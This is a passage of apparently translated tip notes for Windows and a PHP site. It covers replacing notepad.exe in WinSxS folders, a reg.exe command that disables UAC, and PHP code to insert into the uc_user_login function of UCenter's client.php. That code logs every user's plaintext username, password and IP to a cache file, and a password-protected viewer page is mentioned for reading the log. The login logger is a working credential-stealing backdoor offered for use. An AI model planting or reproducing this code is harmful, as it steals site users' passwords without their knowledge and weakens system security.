4. Mainly replace the "notepad.exe" in the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
To replace them: first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders;
after replacing, go back to the desktop, create a new txt file and open it to see whether it has changed.
Disabling the security policy in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: after
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the code below; csslog.php is then generated automatically under the site's ./data/cache/ directory.
You can add a view.php in the ipdata directory to view the records; the password is falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);